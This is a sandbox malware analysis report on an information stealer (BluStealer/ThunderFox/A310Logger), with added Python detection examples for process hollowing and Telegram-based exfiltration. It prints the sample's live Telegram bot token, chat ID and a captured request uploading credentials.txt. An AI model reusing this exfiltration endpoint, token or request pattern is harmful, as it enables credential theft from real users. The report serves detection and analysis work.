

Windows Analysis Report
SecuriteInfo.com.W32.AIDetectNet.01.19566.31995

Overview

General Information

Sample Name: SecuriteInfo.com.W32.AIDetectNet.01.19566.31995 (renamed file extension from 31995 to exe)
Analysis ID: 679095
MD5: 7278f8490937cab29d3dd5bc75cb52ab
SHA1: 69a0419c995fc139ea27e731a44205cb1b686f1d
SHA256: 0fabbda008ee7544a4f2d1bdaf5621f19bc41e82740f293dfe1644fc0af9230b
Tags: exe

Detection

BluStealer, ThunderFox Stealer, a310Logger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected BluStealer
Antivirus / Scanner detection for submitted sample
Yara detected a310Logger
Yara detected ThunderFox Stealer
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Yara detected Generic Downloader
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large array initializations
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Uses a known web browser user agent for HTTP communication
Contains functionality to detect virtual machines (SLDT)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • SecuriteInfo.com.W32.AIDetectNet.01.19566.exe (PID: 2068 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe" MD5: 7278F8490937CAB29D3DD5BC75CB52AB)
    • MSBuild.exe (PID: 3396 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: D621FD77BD585874F9686D3A76462EF1)
    • MSBuild.exe (PID: 6000 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: D621FD77BD585874F9686D3A76462EF1)
      • AppLaunch.exe (PID: 5848 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
  • cleanup
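The tree above shows two MSBuild.exe instances and one AppLaunch.exe started by the sample with no command-line arguments at all, which is what a signed .NET framework binary looks like when it is spawned only to be hollowed (compare the "Creates a process in suspended mode", "Allocates memory in foreign processes" and "Injects a PE file into a foreign processes" signatures). The Python below is an added detection example, not part of the Joe Sandbox report: it walks process-creation events and flags framework hosts that run argument-less under a parent from a user-writable path, or under another argument-less host. The PIDs, images and command lines of the first four events are taken from the tree; the parent PID 1234, the benign devenv.exe/explorer.exe rows and the user-writable path markers are constructed assumptions.

```python
import ntpath

# Process-creation events constructed for this added example. PIDs, parents,
# images and command lines of the first four rows follow the process tree in
# the report above; the remaining rows are made-up benign cases (a real build
# driven by devenv.exe, and an argument-less AppLaunch.exe under explorer.exe).
EVENTS = [
    {"pid": 2068, "ppid": 1234,
     "image": r"C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe",
     "cmdline": r'"C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe"'},
    {"pid": 3396, "ppid": 2068,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"},
    {"pid": 6000, "ppid": 2068,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"},
    {"pid": 5848, "ppid": 6000,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"},
    {"pid": 7000, "ppid": 1,
     "image": r"C:\Program Files\Microsoft Visual Studio\Common7\IDE\devenv.exe",
     "cmdline": r'"C:\Program Files\Microsoft Visual Studio\Common7\IDE\devenv.exe"'},
    {"pid": 7100, "ppid": 7000,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /nologo App.csproj"},
    {"pid": 800, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": r"C:\Windows\explorer.exe"},
    {"pid": 7200, "ppid": 800,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"},
]

# .NET framework binaries that are popular hollowing targets: signed, located
# under C:\Windows, and harmless when started with nothing to do.
FRAMEWORK_HOSTS = {"msbuild.exe", "applaunch.exe"}
FRAMEWORK_DIRS = ("c:\\windows\\microsoft.net\\framework\\",
                  "c:\\windows\\microsoft.net\\framework64\\")
# Path fragments treated as user-writable (assumption; tune per estate).
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\", "\\public\\")


def arguments(cmdline: str) -> str:
    """Everything after the (possibly quoted) image token of a Windows command line."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[end + 1:].strip() if end != -1 else ""
    parts = s.split(None, 1)
    return parts[1].strip() if len(parts) > 1 else ""


def is_framework_host(image: str) -> bool:
    low = image.lower()
    return ntpath.basename(low) in FRAMEWORK_HOSTS and low.startswith(FRAMEWORK_DIRS)


def from_user_writable_path(image: str) -> bool:
    return any(marker in image.lower() for marker in USER_WRITABLE)


def suspicious_hosts(events):
    """Map pid -> reasons for framework hosts that look like injection targets.
    'No arguments' alone is a weak signal (MSBuild builds the project in the
    current directory when run bare), so two independent signals are required."""
    by_pid = {e["pid"]: e for e in events}
    hits = {}
    for e in events:
        if not is_framework_host(e["image"]):
            continue
        reasons = []
        if arguments(e["cmdline"]) == "":
            reasons.append("started without arguments: nothing to build or activate")
        parent = by_pid.get(e["ppid"])
        if parent is not None:
            name = ntpath.basename(parent["image"])
            if from_user_writable_path(parent["image"]):
                reasons.append(f"parent {name} runs from a user-writable path")
            if is_framework_host(parent["image"]) and arguments(parent["cmdline"]) == "":
                reasons.append(f"parent {name} is itself an argument-less framework host")
        if len(reasons) >= 2:
            hits[e["pid"]] = reasons
    return hits


if __name__ == "__main__":
    for pid, reasons in suspicious_hosts(EVENTS).items():
        print(pid, "->", "; ".join(reasons))
```

Run against the constructed events this flags PIDs 3396, 6000 and 5848 (the three hollowed hosts in the tree) and leaves the devenv.exe-driven build and the single-signal AppLaunch.exe alone; in a real pipeline the same two-signal rule maps directly onto a Sigma process_creation selection with a `ParentImage` condition.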
Malware Configuration

BluStealer: {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot5446953292:AAFkDq-HVam91vjV2SXkAWjbhfkBnxaPoa4/sendMessage?chat_id=1269002131"}
Yara matches (memory dumps)

Source | Rule | Description | Author | Strings

Source: 00000010.00000002.403484045.0000000009250000.00000004.08000000.00040000.00000000.sdmp | Rule: Quasar_RAT_1 | Description: Detects Quasar RAT | Author: Florian Roth
  • 0x5fa84:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x5f98d:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x604c0:$op3: 00 04 03 69 91 1B 40
  • 0x60d64:$op3: 00 04 03 69 91 1B 40
Source: 00000010.00000002.403484045.0000000009250000.00000004.08000000.00040000.00000000.sdmp | Rule: HKTL_NET_GUID_SharpScribbles | Description: Detects .NET red/black-team tools via typelibguid | Author: Arnim Rupp
  • 0x96952:$typelibguid0: aa61a166-31ef-429d-a971-ca654cd18c3b
Source: 00000000.00000002.408533446.0000000005B80000.00000004.08000000.00040000.00000000.sdmp | Rule: JoeSecurity_GenericDownloader_1 | Description: Yara detected Generic Downloader | Author: Joe Security
Source: 00000000.00000002.383910090.000000000470F000.00000004.00000800.00020000.00000000.sdmp | Rule: LokiBot_Dropper_Packed_R11_Feb18 | Description: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
  • 0x6212c:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Source: 00000010.00000003.380923428.0000000007E66000.00000004.00000800.00020000.00000000.sdmp | Rule: Quasar_RAT_1 | Description: Detects Quasar RAT | Author: Florian Roth
  • 0x9416c:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x94075:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x94ba8:$op3: 00 04 03 69 91 1B 40
  • 0x9544c:$op3: 00 04 03 69 91 1B 40
(8 further entries not included in this export)
Yara matches (unpacked PEs)

Source | Rule | Description | Author | Strings

Source: 16.3.AppLaunch.exe.7e9a6e8.0.raw.unpack | Rule: Quasar_RAT_1 | Description: Detects Quasar RAT | Author: Florian Roth
  • 0x5fa84:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x5f98d:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x604c0:$op3: 00 04 03 69 91 1B 40
  • 0x60d64:$op3: 00 04 03 69 91 1B 40
Source: 16.3.AppLaunch.exe.7e9a6e8.0.raw.unpack | Rule: HKTL_NET_GUID_SharpScribbles | Description: Detects .NET red/black-team tools via typelibguid | Author: Arnim Rupp
  • 0x96952:$typelibguid0: aa61a166-31ef-429d-a971-ca654cd18c3b
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.466f2e8.2.raw.unpack | Rule: MALWARE_Win_A310Logger | Description: Detects A310Logger | Author: ditekSHen
  • 0x63884:$s1: Temporary Directory * for
  • 0x638c0:$s2: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\*RD_
  • 0x62e94:$s5: MSXML2.ServerXMLHTTP.6.0
  • 0x63058:$s6: Content-Disposition: form-data; name="document"; filename="
  • 0x63804:$s7: CopyHere
  • 0x637cc:$s9: shell.application
  • 0x63830:$s9: Shell.Application
  • 0x62f94:$s10: SetRequestHeader
  • 0x63970:$s12: @TITLE Removing
  • 0x639a8:$s13: @RD /S /Q "
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.466f2e8.2.unpack | Rule: MALWARE_Win_A310Logger | Description: Detects A310Logger | Author: ditekSHen
  • 0x63884:$s1: Temporary Directory * for
  • 0x638c0:$s2: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\*RD_
  • 0x62e94:$s5: MSXML2.ServerXMLHTTP.6.0
  • 0x63058:$s6: Content-Disposition: form-data; name="document"; filename="
  • 0x63804:$s7: CopyHere
  • 0x637cc:$s9: shell.application
  • 0x63830:$s9: Shell.Application
  • 0x62f94:$s10: SetRequestHeader
  • 0x63970:$s12: @TITLE Removing
  • 0x639a8:$s13: @RD /S /Q "
Source: 16.3.AppLaunch.exe.7e9a6e8.0.unpack | Rule: Quasar_RAT_1 | Description: Detects Quasar RAT | Author: Florian Roth
  • 0x5de84:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x5dd8d:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x5e8c0:$op3: 00 04 03 69 91 1B 40
  • 0x5f164:$op3: 00 04 03 69 91 1B 40
(11 further entries not included in this export)
    No Sigma rule has matched
    No Snort rule has matched



    AV Detection

Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe | Virustotal: Detection: 25%
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe | Avira: detected
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe | Joe Sandbox ML: detected
Source: 14.0.MSBuild.exe.400000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.461f2c8.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.470f308.3.unpack | Avira: Label: TR/Dropper.Gen
Source: 0.0.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.f10000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen7
Source: 16.0.AppLaunch.exe.4e00000.0.unpack | Avira: Label: TR/Dropper.MSIL.Gen
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.45f72a8.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.466f2e8.2.unpack | Avira: Label: TR/Dropper.Gen
Source: 14.0.MSBuild.exe.400000.0.unpack | Malware Configuration Extractor: BluStealer {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot5446953292:AAFkDq-HVam91vjV2SXkAWjbhfkBnxaPoa4/sendMessage?chat_id=1269002131"}
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: ThunderFox.pdb | source: AppLaunch.exe, 00000010.00000002.403484045.0000000009250000.00000004.08000000.00040000.00000000.sdmp; AppLaunch.exe, 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp; AppLaunch.exe, 00000010.00000003.380923428.0000000007E66000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\

    Networking

Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.5b80000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.408533446.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Joe Sandbox View | JA3 fingerprint: 10ee8d30a5d01c042afd7b2b205facc4
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: global traffic | HTTP traffic detected:
  POST /bot5446953292:AAFkDq-HVam91vjV2SXkAWjbhfkBnxaPoa4/sendDocument?chat_id=1269002131&caption=credentials.txt:::computer\user HTTP/1.1
  Accept: */*
  Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
  Accept-Language: en-us
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: api.telegram.org
  Content-Length: 201
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49688
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown | Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown | Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49690 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49688 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown | TCP traffic detected without corresponding DNS query (repeated identical entries collapsed, count in parentheses): 131.253.33.200 (12), 40.126.31.4 (4), 93.184.220.29 (9), 173.222.108.210 (7), 209.197.3.8 (5), 23.201.249.71 (3), 23.211.5.146 (1), 13.107.42.16 (3), 13.107.5.88 (6)
Source: MSBuild.exe, 0000000E.00000002.537276033.0000000000F73000.00000004.00000020.00020000.00000000.sdmp; MSBuild.exe, 0000000E.00000003.421757868.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.359072458.000000000340B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://james.newtonking.com/projects/json
Source: MSBuild.exe, 0000000E.00000002.534247106.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/
Source: MSBuild.exe, 0000000E.00000002.534247106.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/Qv
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.383910090.000000000470F000.00000004.00000800.00020000.00000000.sdmp; MSBuild.exe, 0000000E.00000000.351294987.0000000000401000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: MSBuild.exe, 0000000E.00000002.534247106.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot5446953292:AAFkDq-HVam91vjV2SXkAWjbhfkBnxaPoa4/sendDocument?chat_id=1269
Source: MSBuild.exe, 0000000E.00000003.422081191.0000000000F11000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
Source: unknown | DNS traffic detected: queries for: api.telegram.org
Source: unknown | HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.3:49744 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.3:49745 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49751 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.42.16:443 -> 192.168.2.3:49752 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.3:49753 version: TLS 1.2
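The extracted configuration and the captured POST carry the same bot token and chat_id, so those two values, not the shared api.telegram.org host or IP, are what identifies this operator. The Python below is an added example and not part of the Joe Sandbox report: it parses Telegram Bot API calls out of URL strings or HTTP request lines, separates file exfiltration (sendDocument, or a caption naming credentials) from plain beaconing via sendMessage, and collects tokens and chat ids as pivot indicators. The first two input lines are the report's own URL and request line; the getUpdates line with a dummy token, the non-Telegram upload and the credential keyword list are constructed assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed input for this added example. Lines 1 and 2 are the BluStealer
# config URL and the sendDocument request line from the report above; lines 3
# and 4 are made up (bot polling with a dummy token; an unrelated upload) to
# show what is classified differently or ignored.
SAMPLE_LINES = [
    "https://api.telegram.org/bot5446953292:AAFkDq-HVam91vjV2SXkAWjbhfkBnxaPoa4/sendMessage?chat_id=1269002131",
    "POST /bot5446953292:AAFkDq-HVam91vjV2SXkAWjbhfkBnxaPoa4/sendDocument?chat_id=1269002131&caption=credentials.txt:::computer\\user HTTP/1.1",
    "POST /bot1111111111:" + "A" * 35 + "/getUpdates HTTP/1.1",
    "POST /api/v1/upload?file=report.pdf HTTP/1.1",
]

# Bot API path shape: /bot<numeric bot id>:<secret>/<method>[?query]
BOT_PATH_RE = re.compile(
    r"/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]{20,})/(?P<method>[A-Za-z]+)(?:\?(?P<query>\S*))?"
)
# Methods that push content from the victim into the operator's chat.
SEND_METHODS = {"sendMessage", "sendDocument", "sendPhoto", "sendVideo", "sendAudio"}
# Caption fragments typical of stealer output (assumption; extend as needed).
CREDENTIAL_HINTS = ("credential", "password", "passw", "login", "cookie", "wallet")


def parse_telegram_bot_request(line: str):
    """Return the Bot API fields found in a URL or HTTP request line, or None."""
    m = BOT_PATH_RE.search(line)
    if not m:
        return None
    query = parse_qs(m.group("query") or "", keep_blank_values=True)
    return {
        "bot_id": m.group("bot_id"),
        # The full token is the pivot value: every sample using this bot shares it.
        "token": f"{m.group('bot_id')}:{m.group('secret')}",
        "method": m.group("method"),
        "chat_id": query.get("chat_id", [None])[0],
        "caption": query.get("caption", [None])[0],
    }


def classify(fields) -> str:
    """exfil: a file upload or a credential-named payload; c2: another send*
    call to a fixed chat_id (beacon/notification); api: any other Bot API use."""
    caption = (fields["caption"] or "").lower()
    if fields["method"] == "sendDocument" or any(h in caption for h in CREDENTIAL_HINTS):
        return "exfil"
    if fields["method"] in SEND_METHODS and fields["chat_id"]:
        return "c2"
    return "api"


def scan(lines):
    """(line_no, verdict, fields) for every Bot API call found in the input."""
    findings = []
    for no, line in enumerate(lines, 1):
        fields = parse_telegram_bot_request(line)
        if fields:
            findings.append((no, classify(fields), fields))
    return findings


def iocs(findings):
    """Deduplicated pivot values: bot tokens and chat ids."""
    return {
        "tokens": sorted({f["token"] for _, _, f in findings}),
        "chat_ids": sorted({f["chat_id"] for _, _, f in findings if f["chat_id"]}),
    }


if __name__ == "__main__":
    results = scan(SAMPLE_LINES)
    for no, verdict, f in results:
        print(f"line {no}: {verdict:5} method={f['method']} chat_id={f['chat_id']} caption={f['caption']}")
    print(iocs(results))
```

Because Telegram terminates TLS for every bot at the same endpoints, the host and the JA3 fingerprints above only say "some Telegram client"; the token and chat_id recovered from memory strings or decrypted traffic are what lets you match this sample to other submissions.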

    System Summary

Yara rule matches (full rule metadata given once per rule, followed by every source it matched):

Rule: Quasar_RAT_1 | Author: Florian Roth | Description: Detects Quasar RAT | date = 2017-04-07 | reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf | license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE | hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34
  Matched (UNPACKEDPE): 16.3.AppLaunch.exe.7e9a6e8.0.raw.unpack; 16.3.AppLaunch.exe.7e9a6e8.0.unpack; 16.2.AppLaunch.exe.9250000.0.unpack; 16.2.AppLaunch.exe.9250000.0.raw.unpack
  Matched (MEMORY): 00000010.00000002.403484045.0000000009250000.00000004.08000000.00040000.00000000.sdmp; 00000010.00000003.380923428.0000000007E66000.00000004.00000800.00020000.00000000.sdmp

Rule: HKTL_NET_GUID_SharpScribbles | Author: Arnim Rupp | Description: Detects .NET red/black-team tools via typelibguid | date = 2021-01-21 | reference = https://github.com/V1V1/SharpScribbles | license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
  Matched (UNPACKEDPE): 16.3.AppLaunch.exe.7e9a6e8.0.raw.unpack; 16.3.AppLaunch.exe.7e9a6e8.0.unpack; 16.2.AppLaunch.exe.9250000.0.unpack; 16.2.AppLaunch.exe.9250000.0.raw.unpack
  Matched (MEMORY): 00000010.00000002.403484045.0000000009250000.00000004.08000000.00040000.00000000.sdmp

Rule: MALWARE_Win_A310Logger | Author: ditekSHen | Description: Detects A310Logger | snort_sid = 920204-920207
  Matched (UNPACKEDPE): 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.466f2e8.2.raw.unpack; 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.466f2e8.2.unpack; 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.470f308.3.raw.unpack; 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.470f308.3.unpack; 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.45f72a8.0.raw.unpack; 0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.461f2c8.1.raw.unpack; 14.0.MSBuild.exe.400000.0.unpack

Rule: LokiBot_Dropper_Packed_R11_Feb18 | Author: Florian Roth | Description: Auto-generated rule - file scan copy.pdf.r11 | date = 2018-02-14 | reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5 | license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE | hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029
  Matched (MEMORY): 00000000.00000002.383910090.000000000470F000.00000004.00000800.00020000.00000000.sdmp; 00000000.00000002.379707702.0000000004597000.00000004.00000800.00020000.00000000.sdmp; 00000000.00000002.364389176.00000000043F7000.00000004.00000800.00020000.00000000.sdmp

Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, bgr.cs | Large array initialization: tms: array initializer size 2385920
Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe | Code functions: 0_2_01BCF030, 0_2_01BC3D10, 0_2_01BC3D00, 0_2_05484A60, 0_2_05484A50, 0_2_06337E12, 0_2_0633A48D, 0_2_0633BEB5, 0_2_06358337, 0_2_0635DF90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code functions: 16_2_051305B0, 16_2_051305A0, 16_2_05134850, 16_2_05134860
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.383883284.00000000046DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBB NATIVE BOTNET.exe vs SecuriteInfo.com.W32.AIDetectNet.01.19566.exe
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.358839460.00000000033F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs SecuriteInfo.com.W32.AIDetectNet.01.19566.exe
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.384949271.000000000477C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBB NATIVE BOTNET.exe vs SecuriteInfo.com.W32.AIDetectNet.01.19566.exe
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000000.262097375.0000000000F12000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameProforma Invoice INV-87634543-7.exe vs SecuriteInfo.com.W32.AIDetectNet.01.19566.exe
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.361648144.00000000034B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBB NATIVE BOTNET.exe vs SecuriteInfo.com.W32.AIDetectNet.01.19566.exe
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exeBinary or memory string: OriginalFilenameProforma Invoice INV-87634543-7.exe vs SecuriteInfo.com.W32.AIDetectNet.01.19566.exe
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exeVirustotal: Detection: 25%
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
    Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe"
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
